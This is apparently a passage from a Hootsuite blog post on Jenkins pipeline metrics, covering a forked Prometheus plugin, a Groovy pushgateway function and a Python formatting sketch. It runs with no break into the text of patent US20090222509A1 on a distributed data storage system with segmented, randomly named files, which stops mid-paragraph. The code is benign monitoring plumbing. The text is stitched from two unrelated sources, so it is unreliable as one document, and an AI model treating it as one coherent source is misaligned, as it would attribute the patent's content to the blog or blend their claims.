Currently, our two main sources of metrics come from the Jenkins Prometheus plugin and a Jenkins Library function we built to send metrics to a push gateway, which then injects the metrics into Prometheus. The first way we collect metrics is via the Jenkins Prometheus plugin installed on our Jenkins instance. We use a forked version of the plugin so that it better meets our requirements. This is because we run our Jenkins instance on Kubernetes (using the Kubernetes plugin); and, while the Prometheus plugin is great on its own, we found that due to the default naming scheme it was creating a separate metric for every Kubernetes pod that was spun up. This was due to our Jenkins agent design where we have multiple different kinds of pods for the many different kinds of jobs that we build. Every pod also includes a random string in its name on creation, and together this created excessive cardinality in our metrics. So, in our fork we removed the pod name from the metric name and instead have the pod names as labels to reduce the load as well as to match our internal metric naming conventions. These metrics are exposed on the /prometheus path and served on port :9191 using the metrics sidecar on the Jenkins instance. The metrics can then be found by the Prometheus scraper, which is running as a separate Kubernetes pod, and exported into Prometheus. The metrics we collect using the Prometheus plugin are used to give us insight into how Jenkins itself is handling the jobs that are run. For example, the metrics we use include: - The queue time for jobs waiting to be built. This lets us know if pods for specific build types are taking an excessive amount of time to start up. This could include errors on the Docker image used to create the pod on Kubernetes, blocked queues due to locked jobs, and misconfigurations in the pod templates - The percentage of successful builds per pipeline.
This alerts us if there are builds on Jenkins that consistently fail; or, if we start seeing high rates of failure across all builds, we can take action to investigate what is causing issues. - The total number of active pipeline jobs. This keeps track of any dead jobs that should either be maintained or deleted; but, also helps us identify the total number of builds we are actively supporting - The rate of builds per hour. This lets us know during what times Jenkins is most heavily used. It gives us insight into how many resources we need to support at different times. Our second metric collection method is done using a Jenkins Shared Library function that we built in house. This function can be called in any pipeline and provides more job-specific metrics to developers to track how their project is performing. It is implemented through a shared library that is used by all pipeline jobs on Jenkins and it is integrated into the default build flow of all jobs. It also supports sending custom metrics for jobs that developers want additional insight into. To collect these metrics we use both the Weaveworks Prometheus aggregation gateway, for collecting the counters and histograms built in the JSL function, and the Prometheus pushgateway, for collecting gauges. In the case of both of these gateways we build out metrics to match the Prometheus data model notation. This allows us to name our metric, assign any labels we want (such as job name and branch), and assign the value we want to send for the metric. These metrics are then also scraped in the same way as those sent by the Prometheus plugin and are then also available in Grafana.

// url (String): URL for either the aggregating-pushgateway server
//               or the pushgateway server. Gauges are sent to
//               pushgateway, all other metrics are sent to the
//               aggregating-pushgateway
// msg (String): The data to be sent to Prometheus in notation form
def send_message(String url, String msg) {
    def pushGateway = new URL(url).openConnection()
    pushGateway.setRequestMethod("POST")
    pushGateway.getOutputStream().write(msg.getBytes("UTF-8"))
    def postRC = pushGateway.getResponseCode()
    if (!postRC.equals(200)) {
        println("Unable to send metrics")
    }
}

The metrics we collect using the Jenkins Shared Library include the duration of the different stages in a build pipeline, the success and failure rate of each of those stages, the percentage of test coverage for different jobs, and how often each of our Jenkins Shared Library functions is called. The duration of stages tells us which areas are slowest and could benefit from caching or increased resources. The success and failure rate of stages lets us know where pipelines are most likely to fail and could use reliability improvements. Test coverage informs developers of how much confidence they can have that their deployment is stable. And, our metric for tracking how often our custom functions are called lets us know what developers are finding the most useful; or, if a function has low usage, that either we have not shared it well enough with developers or it does not meet their requirements. Together these two methods of metrics collection provide both our team and developers with increased insight into how jobs are performing on Jenkins and where our time would be best spent to improve developer experience. We also have future plans to continue to improve our metrics and ensure that our data is useful. This will allow us to improve the experience developers have when interacting with a Jenkins pipeline.
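The body that send_message POSTs is plain Prometheus text exposition format: one line per sample, with the metric name, optional labels, and a value. Here is a rough Python sketch of assembling such a payload (the metric and label names are made-up illustrations, not Hootsuite's actual metrics):

```python
def format_metric(name, labels, value):
    """Build one sample line in Prometheus text exposition format:
    metric_name{label1="v1",label2="v2"} value
    """
    label_str = ",".join('%s="%s"' % (k, v) for k, v in sorted(labels.items()))
    return "%s{%s} %s\n" % (name, label_str, value)

# Hypothetical stage-duration sample for a pipeline build
line = format_metric(
    "jenkins_stage_duration_seconds",
    {"job": "the-dashboard", "stage": "integration-test"},
    74.5,
)
print(line)  # jenkins_stage_duration_seconds{job="the-dashboard",stage="integration-test"} 74.5
```

A payload built this way is exactly the kind of string that would be handed to send_message as msg.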
We also plan to revisit test metrics to investigate the value of data not only on the percentage of test failures and test coverage, but also on how often different tests for different features are run, and the percentage of different types of tests (smoke, API, etc.) that are run. With this data we want to build a better understanding of how testing is done at Hootsuite. The Benefits of a Well-Oiled Pipeline With these changes we have seen an increase in the reliability of our running Jenkins jobs. Our new metrics system has allowed us to accurately track any issues that arise from the many pipelines that are run far more quickly than word of mouth and complaints. They not only allow us to act quickly when an incident occurs but also allow us to easily view the trends of our pipelines, often preventing incidents before they even happen. We now also use them as part of our SLOs, allowing us to promise developers that their pipelines will begin building within a certain timeframe, to track the reliability of the different Jenkins agents that we use, and to guarantee the availability of Jenkins itself. Finally, our metrics are also available on the pipelines that developers at Hootsuite manage themselves. This allows them to have better insight into their own code bases and the reliability of their own projects that are run on Jenkins. Back to the example of The Dashboard project, there is now a dedicated team maintaining and improving the pipeline and its related services. It is in a much better state than it was before. Just look at our new metrics for the proof. Not only are builds passing with a success rate of 95% instead of 50%, but we also now have metrics on the Dashboard-specific tests.
US20090222509A1 - System and Method for Sharing Storage Devices over a Network

Abstract

A distributed data sharing system provides storage areas for network clients. Files are written in such a manner that user data is protected and/or so that the network can make use of any available space at a network when saving files.

Description

- [0001]1. Field of the Invention
- [0002]This invention relates to sharing resources over a network and, in particular, sharing storage space among network nodes.
- [0003]2. Description of the State of the Art and Background
- [0004]The term “file system” refers to the system designed to provide computer application programs with access to data stored on storage devices in a logical, coherent way. A file system may be understood as a set of abstract data types that are implemented for the storage, hierarchical organization, manipulation, navigation, access, and retrieval of data. File systems hide the details of how data is stored on storage devices. For instance, storage devices are generally block addressable, in that data is addressed with the smallest granularity of one block; multiple, contiguous blocks form an extent. The size of the particular block, typically 512 bytes in length, depends upon the actual devices involved. Application programs generally request data from file systems byte by byte. Consequently, file systems are responsible for seamlessly mapping between application program address-space and storage device address-space.
File systems store volumes of data on storage devices. The term “volume” refers to the collection of data blocks for one complete file system instance. These storage devices may be partitions of single physical devices or logical collections of several physical devices. Computers may have access to multiple file system volumes stored on one or more storage devices. - [0005]An operating system may be understood as the software that manages the sharing of the resources of a computer and provides programmers and users with an interface to those resources; it also forms a platform for other system software and for application software. This platform is usually provided in the form of an Application Program Interface (“API”). - [0006]Most current operating systems are capable of using the TCP/IP networking protocols. This means that computers running dissimilar operating systems can participate in a common network for sharing resources such as computing, files, printers, and scanners using either wired or wireless connections. - [0007]Files are presented to application programs through directory files that form a tree-like hierarchy of files and subdirectories containing more files. Application programs identify files by pathnames comprised of the filename and the names of all encompassing directories. The complete directory structure is called the file system namespace. For each file, file systems maintain attributes such as ownership information, access privileges, access times, and modification times. A “filename” is intended to mean the logical name assigned for the collection of data associated with the file, as understood by a user and mapped to physical, or non-volatile, memory by the file system. A logical filename may be referred to as the unique name for the file in a file system's directory, or the concatenation of a logical filename and a logical pathname.
- [0008]The terms real-data and metadata classify application (or user) data and information pertaining to file system structure data, respectively. Real-data may be understood as the data that application programs or users store in regular files. Conversely, file systems create metadata to store volume layout information, such as inodes, pointer blocks, and allocation tables. Metadata is not directly visible to applications. Metadata can sometimes provide extensive information about the who, what, where, and when of a file. Metadata may also be stored with the real data by an application, such as the metadata stored with the real data in a Microsoft Word® document. - [0009]Some file systems maintain information in what are called File Allocation Tables (“FATs”), which indicate the data blocks assigned to files and the data blocks available for allocation to files. A FAT is a table that an operating system maintains on a hard disk that provides a map of the clusters (the basic units of logical storage on a hard disk) in which a file has been stored. FATs are maintained in the Microsoft Windows® operating systems. - [0010]Distributed file systems provide users and application programs with transparent access to files from multiple computers networked together. Architectures for distributed file systems fall into two main categories: network attached storage (NAS)-based and storage area network (SAN)-based. NAS-based file sharing, also known as “shared nothing”, places server computers between storage devices and client computers connected via LANs. In contrast, SAN-based file sharing, traditionally known as “shared disk” or “share storage”, uses SANs to directly transfer data between storage devices and networked computers. - [0011]I/O interfaces or devices transport data among computers and storage devices. Traditionally, interfaces fall into two categories: channels and networks. Computers generally communicate with storage devices via channel interfaces.
Channels typically span short distances and provide low connectivity. Performance requirements often dictate that hardware mechanisms control channel operations. The Small Computer System Interface (SCSI) is a common channel interface. Storage devices that are connected directly to computers are known as direct-attached storage (DAS) devices. - [0012]Computers communicate with other computers through networks. Networks are interfaces with more flexibility than channels. Local area networks (LAN) connect computers over medium distances, such as within buildings, whereas wide area networks (WAN) span long distances, like across campuses or even across the world. LANs normally consist of shared media networks, like Ethernet, while WANs are often point-to-point connections, like Asynchronous Transfer Mode (ATM). Transmission Control Protocol/Internet Protocol (TCP/IP) is a popular network protocol for both LANs and WANs. - [0013]Recent interface trends combine channel and network technologies into single interfaces capable of supporting multiple protocols. For instance, Fibre Channel (FC) is a serial interface that supports network protocols like TCP/IP as well as channel protocols such as SCSI-3. Other technologies, such as iSCSI, map the SCSI storage protocol onto TCP/IP network protocols, thus utilizing LAN infrastructures for storage transfers. - [0014]The network interface(s) between a computer, DAS storage, network storage or server and the rest of the network is sometimes referred to as a node. A node may also correspond to a network communication device, such as a network switch. - [0015]Network architecture is oftentimes understood by reference to a network topology. A topology refers to the specific physical, i.e., real, or logical, i.e., virtual, arrangement of the elements of a network.
Two networks may have the same topology if the connection configuration is the same, although the networks may differ in physical interconnections, distances between nodes, transmission rates, and/or protocol types. The common types of network topologies are the bus (or linear) topology, fully connected topology, mesh topology, ring topology, star topology, and tree topology. Networks may also be characterized as de-centralized, such as a linear topology or a peer-to-peer network in which each node manages its own communications and data sharing directly with another node, or a centralized topology such as a star topology. A combination of different topologies is sometimes called a hybrid topology. - [0016]A bus topology is a network in which all nodes are connected together by a single bus. A fully connected topology is a network topology in which there is a direct path between any two nodes. A mesh topology is one in which there are at least two nodes with two or more paths between them. A ring topology is a topology in which every node has exactly two branches connected to it. A star topology is one in which peripheral nodes are each connected to a central node. A tree topology, from a purely topologic viewpoint, resembles an interconnection of star networks in that individual peripheral nodes are required to transmit to and receive from one other node only, toward a central node, and are not required to act as repeaters or regenerators. The function of the central node may be distributed. As in the conventional star network, individual nodes may thus still be isolated from the network by a single-point failure of a transmission path to the node. - [0017]The invention is directed to embodiments of a Distributed Data Storage System or DDSS. A DDSS may allow one or more clients of a network to more fully utilize storage space available over a network and/or store data while maintaining an adequate level of privacy/security for sensitive information contained within the data. - [0018]In one embodiment, there is a method for a client to store a file over a network that includes a server node and storage nodes A and B.
This method includes the steps of the client accessing storage space at the server node after the server recognizes the client as a client of the server, and writing a first data segment of the file to node A and a second data segment of the file to node B. - [0019]The writing step includes the steps of choosing node A and node B for storage of the first and second data segments, respectively, generating a segment A filename for the first data segment and a segment B filename for the second data segment, and writing Segment A to node A and Segment B to node B. After writing segments A and B, the server saves a map that enables the re-assembly of the file from the first and second data segments. - [0020]The map may be meta data including records of filenames and nodes where the associated files may be found, the identity of the owner of the original file, the network address for the owner, and the information needed to re-assemble the files from the file segments. The file segments may also be written with a user-selectable degree of redundancy. Each segment may be redundantly stored at network nodes so that if a node becomes unavailable, a redundant copy is available. The meta data may then include both data segment information and redundant data segment information in the event the redundancies are needed to recover the file. - [0021]In one embodiment, the client may read and write data independent of the server. According to this embodiment, the client performs a read and write as it normally would, and regardless of the presence of the server node. The server is called upon only to retrieve the logical filenames and their locations, and the mapping between the plurality of data segments and the ordering of these segments in the original file. - [0022]The filenames may be randomly generated filenames.
As such, the presence of two data segments of a file in a directory, among other files with randomly generated filenames, would not be apparent to one viewing the directory contents. That is, one could not recognize that the two segments were taken from the same file. The two data segments, if located adjacent to each other according to an application's mapping of the data in the file, are preferably not written to the same node. This will make it more difficult to discern a relationship between the two data segments. - [0023]The nodes where data segments are written may be determined by the server node and recommended to the client. The server may select nodes based on at least one of the following criteria: the level of network traffic at a node, the number of packet errors per transmission to/from a node, the type of storage medium at the node, and the type of communication link(s) between the client node and storage device(s). The server may recommend nodes to a client by assigning a node score for each node. The client may then select the nodes that exceed a threshold node score. - [0024]The server may provide the information on the available nodes and the filenames for storing segments. In other embodiments, a client side module may provide one or both of these functions, in which case the server may only serve as a secure databank and client account manager for the DDSS. The client may select the number of segments independent of the status of nodes, and then write segments to nodes based on their availability only. The client may also generate the filenames and match those filenames to nodes. Under these embodiments, the client module would utilize a random filename generation routine and a node selection routine. The meta data would only be stored in virtual memory, and after a successful write the information would be sent to the server for storage and then erased at the client node.
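The node-scoring recommendation in paragraph [0023] could be sketched as below. The weighting formula, field names, and threshold are illustrative assumptions; the patent does not specify any particular scoring function:

```python
def node_score(traffic, packet_errors, medium_weight, link_weight):
    """Score a node: reward fast storage media and links, penalize
    busy or error-prone nodes. The weights are arbitrary choices."""
    return medium_weight + link_weight - 2.0 * traffic - 5.0 * packet_errors

# Hypothetical node statuses reported by the server
scores = {
    "nodeA": node_score(traffic=0.2, packet_errors=0.0, medium_weight=1.0, link_weight=1.0),
    "nodeB": node_score(traffic=0.9, packet_errors=0.3, medium_weight=1.0, link_weight=0.5),
}
threshold = 0.5
eligible = [n for n, s in scores.items() if s > threshold]
print(eligible)  # ['nodeA']
```

Per paragraph [0023], the client would then write segments only to the nodes whose score exceeds the threshold.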
- [0025]The map file, or the DDSS meta data, may be located only at the server and stored so that only the owner of the file has access to the information. The map file may be stored in a password protected storage at the server, or encrypted at a site accessible to other nodes on the network. - [0026]The client node may be configurable for separate communication links with a plurality of nodes, including at least the server node, and nodes A and B. A method according to one embodiment may further include the steps of the client requesting from the server the available nodes for data storage and then receiving from the server the availability of the plurality of nodes, the client segmenting the file into Segments A and B based on the availability of nodes A and B, and the client writing Segments A and B to the respective nodes A and B, and a copy of Segment A to a different one of the available plurality of nodes. An application resident at the client node may request the file, which may be retrieved by accessing segments and one or more redundant copies of segments until the file can be fully re-assembled and passed to the application. - [0027]In another embodiment, a file storing method for storing a file over a network having a plurality of storage devices at network nodes, the file containing real data, includes the steps of partitioning the real data into a plurality of real data segments, generating a random filename for each one of the real data segments, associating each of the real data segments with its respective randomly generated filename, and storing each of the real data segments on one of the plurality of storage devices. The storing step may include storing the metadata needed to reconstruct the file from the data segments at a restricted node on the network, which is accessible to only the owner of the file.
Further, the real data segments may be partitioned from the file in a sequential order according to their relative byte locations in the file, and the real data segments are stored on one or more of the plurality of nodes in one of a random, intermittent or non-sequential order. A sequential ordering of the bytes can be the order in which an application orders the information in the file. - [0028]A DDSS may be implemented on any network topology and storage areas that can be accessed over a network. DAS or network storage can be included as DDSS storage areas. In another embodiment, a computer network includes a second communication link between the client and the server such that the client is enabled for accessing the information needed to re-assemble the file when the client wishes to re-assemble the file from the data segments. - [0029]A computer network may include a plurality of redundant nodes storing redundant data segments. A method for a computer to access data associated with a user's file, the data being stored as a plurality of data segments distributed over a network having nodes, and as a plurality of copies of the data segments over the nodes, includes the steps of the computer requesting from a network node the locations of the data segments and copies of data segments, and the computer accessing a node in order to retrieve a data segment. If the data segment at the node is inaccessible, then the computer attempts to access a different node where a redundancy of the segment is stored. This process is repeated until a copy of the segment is accessible to the computer. - [0030]In some embodiments a DDSS is run by application programs that are loaded and run over a local operating system, and that read and write information based on filesystems managed by the local operating system. The application may include a DDSS server module. DDSS clients may be added by downloading a client module from the server.
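The partitioning and random-filename scheme of paragraph [0027] can be sketched as below. This is a minimal illustration; the function names and the shape of the meta data records are invented for the example:

```python
import secrets

def partition_file(data: bytes, n_segments: int) -> list[bytes]:
    """Split the real data into sequentially ordered, roughly equal segments."""
    size = -(-len(data) // n_segments)  # ceiling division
    return [data[i:i + size] for i in range(0, len(data), size)]

def store_segments(data: bytes, n_segments: int, nodes: list[str]):
    """Return (stored, map_entries): `stored` stands in for the writes to the
    nodes, keyed by (node, random filename); `map_entries` is the DDSS meta
    data that alone records which filename holds which ordinal piece."""
    stored, map_entries = {}, []
    for order, segment in enumerate(partition_file(data, n_segments)):
        filename = secrets.token_hex(16)      # randomly generated filename
        node = nodes[order % len(nodes)]      # disperse segments over the nodes
        stored[(node, filename)] = segment
        map_entries.append({"order": order, "node": node, "filename": filename})
    return stored, map_entries
```

Without the map entries, the segment files are indistinguishable from any other randomly named files in a directory, which is the privacy property relied on above.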
- [0031]In another embodiment, software residing on a storage medium and adapted for providing server-like functions includes a fourth portion for limiting access to the map file to only the owner of the source file. - [0032]In another embodiment, software residing on a storage medium and adapted for providing client-like functions includes a fifth portion for gaining access to a map file on a network node, the map file containing a previously communicated relationship between filenames and the nodes where the data portions reside, and the relationship between the data portions and the data as it existed in the source file. - [0033]According to some embodiments, after a write attempt is detected or a write request is sent to the server, a server module and a client module together perform a DDSS write process. This process includes transferring the real data in a file to the DDSS storage space assigned to the client. The real data is segmented and stored in different files called file segments. After the real data is transferred, DDSS meta data is generated describing where the file segments of the file are located, and the order in which the file is re-assembled from the file segments. This DDSS meta data is stored in physical memory only at the DDSS server, which is password protected. - [0034]In some embodiments, a network includes a plurality of DDSS nodes for storage and a plurality of DDSS clients. Some of the nodes may also be clients. The plurality of DDSS clients and nodes may access their respective DDSS meta data at a primary server. The primary server includes a password-protected site for the meta data associated with each of the clients' files. The meta data contains the information about the clients' files necessary for re-assembling the files from file segments. Alternatively, meta data for each client's files may be stored in an encrypted file that is read into a client's or the server's cached memory when a client initiates a DDSS session. The primary server includes software for maintaining client accounts.
In the event that the primary server becomes unavailable, one or more secondary servers can be called upon to serve in place of the primary server. The secondary servers can be local servers designated to manage only a subset of clients. - [0035]A DDSS may be implemented within a peer-to-peer or server-less network environment, as well as within a centralized network environment. In some embodiments, a DDSS server and client(s) may be configured by installing and running respective server and client applications on a designated server that interfaces with an operating system's application program interface (“API”). In these embodiments, the DDSS can be initiated or terminated like other programs, and have access to system resources through the API like any other application program. - [0036]Preferably, file segment information is only viewable by someone with administrative rights at the DDSS server. Thus, no user at a client node may see where its file information is stored, and the client module only has temporary access to this information. Indeed, even users interacting with DDSS clients have no way of seeing where the actual files were stored, the filenames used, the partitioning of data, etc. Information for accessing the actual files and locations is kept in nonvolatile memory only at the DDSS server. The DDSS client is provided with the mapping information it needs only when a valid read/write request is made, but the information necessary to make system calls through the DDSS client operating system, or network server operating system, is only maintained in temporary memory. In this way, file locations are only known at the DDSS server. After a successful read/write is made, information pertinent to the read/write is reported back to the DDSS server and then removed from memory at the DDSS client. Thereafter, the same file can be accessed only by requesting the information again from the DDSS server.
However, at no time may a user of the computer designated as a DDSS client view the segment filenames or paths for the read/write, only the logical filename that represents the segmented data as a single file. - [0037]A DDSS may provide a level of security and privacy as a replacement for data encryption methods. A DDSS may segment files into smaller and smaller segments, distributed over a wider set of nodes, to achieve an increasing level of privacy protection. DDSS file storage, however, can be less machine intensive since the data need not be encrypted and decrypted in connection with each write and read request. - [0038]A DDSS can store data on remote DAS devices, which may reside at a node operated by a user unknown to the client. However, the DDSS may be configured to select a desired level of privacy protection for the information described in the stored data. A user at a DDSS client node need not be concerned with sensitive information described in a file and written to another user's local storage being accessible to the other user, because only a portion of the file is written to the other user's device, and a file or a portion thereof is broken up among a plurality of files on other nodes not normally accessible to the same user. As such, files may be segmented and distributed such that no one file can convey meaningful information to a user with access to local files. Only when file segments are combined will the assembled data convey meaningful information. - [0039]“Meaningful information” is intended to mean information that is capable of conveying a concept, idea, thing, person, etc. to someone who has access to the data.
For example, if text in a natural language, e.g., English, is stored according to the DDSS, only a portion of the text may be written to a single node, but this data does not contain a sufficient portion of the text to communicate any meaning in the natural language, much less suggest what information is conveyed in the remainder of the data. The information may be sufficiently distributed among separate files, called file segments, spread over one or more network nodes in a random pattern and with randomly generated filenames, to provide a desired level of security for sensitive information in accordance with this aspect of a DDSS. Other file security measures known in the art may be included, such as encryption, without departing from the scope of this disclosure. - [0040] FIG. 1 is a schematic illustration of a first embodiment of a distributed data storage system (“DDSS”) for a network. - [0041] FIG. 2A is a schematic illustration of the components of a server-side module portion of the DDSS of FIG. 1. - [0042] FIG. 2B is a schematic illustration of the components of a client-side module portion of the DDSS of FIG. 1. - [0043] FIG. 3 is a flow process associated with writing a file to memory according to a DDSS. - [0044] FIG. 4 is a flow process associated with retrieving the file written to memory according to the process of FIG. 3. - [0045] FIG. 5 is a flow process associated with updating or overwriting the file written to memory according to the process of FIG. 3. - [0046] FIG. 6 is a schematic illustration of DDSS meta data. - [0047] FIG. 7 is a schematic illustration of a second embodiment of a DDSS for a network. - [0048]Devices connected over a network will often have significant portions of unused storage space because the local storage space is not readily available over the network.
For example, a Local Area Network (“LAN”) for an enterprise will often include devices such as personal computers (“PCs”) and file and print servers, each of which can have significant local data storage capacity. The term “local storage capacity” is intended to mean a storage medium, such as a magnetic disk, that is available to a device when it is not connected to the network. - [0049]This local storage capacity is typically not available to members of the network. This is especially true in LANs that require all files to be located on a network server drive so that the file is readily available when needed, can be tracked and backed up on a regular basis, and will be available when a network device is not available, e.g., when the device is turned off or not functioning properly. In most cases, an enterprise will also prefer central storage over local storage for purposes of more easily managing access and/or viewing rights of files and related protection of sensitive enterprise information. As such, one or more devices connected over the network can have significant storage capacities that are never exploited because enterprise files are maintained at a central server location rather than locally. - [0050]Despite the vast increases in storage capacities over the years, network servers can still prove inadequate for the storage demands over a network. Moreover, even when space is adequate on the server drive, simultaneous read/write demands on the server drive from network nodes can result in exceedingly slow upload and download rates to/from nodes over the network. Attempts have been made to increase the server response time or to more efficiently allocate resources by, e.g., implementing schemes for caching more frequently accessed data over the network. - [0051]The invention is directed to embodiments of a Distributed Data Storage System or DDSS.
A DDSS allows network clients to access devices at node(s) located on, or accessible to, the clients (hereinafter referred to as “DDSS nodes”, “available nodes” or simply “nodes”). This increases the available storage space over the network by utilizing storage space that would otherwise be wasted. In some embodiments, the DDSS may be used to store information over remote DAS devices that individually do not have the space to store the file or whose read/write capability is not suited for a large file. - [0052]In some embodiments a DDSS provides a read and write capability for user data to nodes in such a manner as to maintain a level of privacy and/or confidentiality for a user's data without resorting to procedures requiring verification of, or granting privileges to, a user whenever a read and write call is made to a storage device. Client data may be protected by partitioning the real data associated with a user filename into several data segments, and then saving these data segments across all, or a portion of, the available nodes on a network. User data is accessed through these segments, and modified data is re-saved in the same or different segments depending on the current availability of nodes. In some embodiments data segments can be saved redundantly in case a node becomes unavailable to the DDSS. - [0053]In one embodiment, a DDSS is implemented as a DDSS server located at one node of a network and DDSS clients located at one or more other nodes. The network may be a peer-to-peer or server-less network, or a network in which one or more dedicated servers, e.g., print, file, e-mail, are connected at one or more network nodes. A DDSS server and client(s) according to this embodiment may be configured by installing and running respective server and client applications over the operating systems located at each of the respective designated server and client nodes.
In this embodiment, the DDSS can be initiated or terminated like other applications resident at network nodes, and can access a computer's system resources through an operating system's application program interface (“API”). - [0054] FIG. 1 is a schematic illustration of a network having a DDSS capability. Node 1 is designated as a DDSS server node and node 2 as a DDSS client node. A DDSS server module application (“server-module”) 20 a is installed at node 1; and a DDSS client module application (“client-module”) 20 b is installed at node 2. The server-module and client-module interact with each other when a user at the client node 2 requests a DDSS read or write. It will be understood that nodes 3, 4, and 5 may also be designated as DDSS clients. Further, node 1 may be designated as both a DDSS server and a DDSS client. Finally, the number of network nodes that may be part of a DDSS is not limited to the five depicted in FIG. 1. Thus, the five nodes depicted in FIG. 1 should not be interpreted to indicate that a DDSS is limited to smaller networks. Indeed, a DDSS may be most useful on large networks where there are several nodes that can be utilized by the DDSS for storage, and data may be more widely dispersed to maintain confidentiality/privacy of data. - [0055]Connections 11 a, 12 a, 13 a, 14 a and 15 a may correspond to connections over a LAN or WAN. The connections may be made by physically connected nodes, such as through routers, switches, hubs and network servers. A node may function as both a DDSS server and a network server. Some connections may be made by way of a wireless connection, or a mix of wireless and physical connections among nodes. Standard network communication protocols may be used to communicate and transfer data according to a DDSS. - [0056]Each node may connect to a variety of computer types, such as a workstation or multi-function printer.
For example, node 4 connects a computer having an I/O device such as a keyboard and/or mouse 4 d, and monitor 4 b. Other nodes in the network may connect to a server computer, workstation, and/or a Personal Data Assistant (“PDA”), etc. Nodes 1, 2, 3 and 4 have a local storage capacity as designated by storage icons 1 c, 2 c, 3 c and 4 c. Nodes may be DDSS clients but have only minimal local storage capacity, such as node 5, or local storage that is not accessible to the DDSS over the network. One example would be a thin client, such as a terminal, or a device whose filesystem is incompatible with a filesystem of a DDSS client. A node may also connect to a computer blade having local storage, processor, motherboard, operating system, etc., but no I/O device other than a network I/O device. - [0057]Storage at DDSS nodes 1, 2, 3 and 4 is indicated by storage areas 1 c, 2 c, 3 c and 4 c, respectively. A storage device, e.g., storage device 1 c, may correspond to a single device, or a cluster of devices organized in a logical way so that they may be part of a single namespace. Each of these storage areas is partitioned between a portion 11 a, 12 a, 13 a, 14 a and 15 a restricted to a local account and a portion 11, 12, 13, 14 and 15 accessible to the DDSS server and client(s) over the network. Portions 11, 12, 13, 14 and 15 may be made accessible to the DDSS server and client modules 20 a, 20 b by way of any suitable file sharing utility known in the art. One example is the file sharing utility provided in the Microsoft Windows XP® operating system. Standard network and channel protocols may be used to transfer data to/from the server, client and storage devices, as well as to communicate commands or requests over the network as known in the art. Thus, it is understood that the disclosed DDSS may be implemented using existing network architecture, including the communication and data transfer protocols used by networks.
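As a rough sketch of how the DDSS-accessible portions 11, 12, 13, 14 and 15 might be represented and checked by a DDSS module, consider the following; the class and mount paths are hypothetical, and in practice the shared portions would be exported by the operating system's file sharing utility as described above:

```python
import os
from dataclasses import dataclass

@dataclass
class SharedStorageArea:
    """One DDSS-accessible portion of a node's storage, e.g. portion 12 at
    node 2; the mount path is an invented example."""
    node_id: str
    shared_path: str

    def is_available(self) -> bool:
        # Usable by the DDSS only if the shared portion is reachable and writable.
        return os.path.isdir(self.shared_path) and os.access(self.shared_path, os.W_OK)

areas = [SharedStorageArea("node2", "/mnt/ddss/portion12"),
         SharedStorageArea("node3", "/mnt/ddss/portion13")]
available = [a.node_id for a in areas if a.is_available()]
```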
- [0058]The DDSS selectively accesses storage areas 11, 12, 13, 14 and 15 at the available nodes, which may include network or DAS storage devices associated with a node. A storage device may include such physical memory devices as magnetic or optical storage mediums, solid state devices, or any other suitable device that provides physical storage space. DDSS storage space may also reside at remote storage area(s) connected to a node through another network connection. For example, node 3 may be a NAS server connected to clusters of storage devices 3 c or another network having a plurality of additional available nodes. The storage spaces may be DAS devices accessible through a local operating system that grants read/write privileges to the DDSS over the network. Both DAS devices and network storage, e.g., central server, SAN, NAS or SAN-NAS hybrid architectures, network printers, e-mail and file servers, etc., having a storage capacity may be included among the storage spaces accessible to the DDSS. - [0059]A DDSS may be added to an existing network by a DDSS initialization routine, which may be directed through a DDSS server computer, e.g., node 1, a computer which has an installed DDSS server module 20 a. The DDSS initialization procedure includes mapping a portion, e.g., a folder, directory or volume, of the DDSS server storage space to the DDSS clients' filesystems. Thereafter, the DDSS client(s) may access its assigned portion of the DDSS server space. The client's allocated DDSS space may be added to the client's filesystem as a new volume included in, e.g., the client's File Allocation Table (“FAT”). - [0060]DDSS initialization also includes mapping the storage space available to the DDSS over the network, e.g., mapping the space 11, 12, 13 and 14. In some embodiments, this storage space is directly mapped to both the server's filesystem and each of the clients' filesystems.
In these embodiments, both the client and the server can access the storage space independently of each other. Further, because the client computer's filesystem may include a mapping of its allocated remote storage space, the client computer's operating system may read data from, or write data to, the remote storage space just as it would for any other device. Remote space may be added as new volumes included in the server's and clients' FATs. - [0061]In some embodiments, the server may access the DDSS storage space to perform operations such as removing files that were not properly replaced or updated due to a system crash at the node or over the network. The server may also access nodes for purposes of monitoring the network traffic to/from a node, as will be explained shortly. Clients may only perform a read and/or write for files located in their allocated DDSS storage space. In some embodiments, at both the server and client nodes there may be an administrator account that has greater access rights than a client to the DDSS server storage and/or the storage space at the nodes. The administrator account may be used to re-partition storage space among clients, remove old files and/or clean up DDSS storage space, re-initialize the DDSS, restore files (either DDSS server or DDSS client data) from a remote backup, add/remove a node to the DDSS, add/remove DDSS clients, servers, etc. - [0062]Clients may be created/added to the DDSS by downloading a copy of the DDSS client-side application (e.g., client module 20 b) from the DDSS server-side application (e.g., server module 20 a). Initialization of a client through the client module may include such steps as creating a client account at the server side, setting up a client quota of storage space, creating a password for accessing the DDSS, selecting a directory or folder location on the client computer for storing DDSS-related files, etc.
The initialization process would also include mapping the server storage space for the client to the client's filesystem, and the mapping of the remote space allocated to the client, either directly or through the server (as discussed earlier). - [0063]Once initialized, the DDSS can be accessed by the clients. The server application is preferably running continuously, whether or not there is a client session in progress. Most of the DDSS server space may be mirrored in cached memory to increase speed. This is possible because most of the DDSS server space contains only information about files, such as the metadata and file names, as opposed to the real data contained in the files. The contents of the server space may be frequently written to a designated backup device in the event that the server computer becomes unavailable. In a preferred embodiment, a file, once saved to the DDSS, is removed from the client's storage space. Thereafter, the client's file is accessible through the DDSS storage space and backup. - [0064]In the event the DDSS server computer fails, or the server node becomes inaccessible or unavailable to one or more clients, one or more secondary or backup DDSS servers may be called upon to act as DDSS servers until the primary server is available again. In these embodiments, a DDSS session may include periodic updates to the secondary, or backup, DDSS server(s), which are installed and resident in memory at the designated backup server but otherwise inactive until the primary DDSS server becomes unavailable. When the primary server becomes unavailable to one or more nodes, the backup servers may be notified of this event through frequent “pings” of the server node, or by a message received from one or more client nodes.
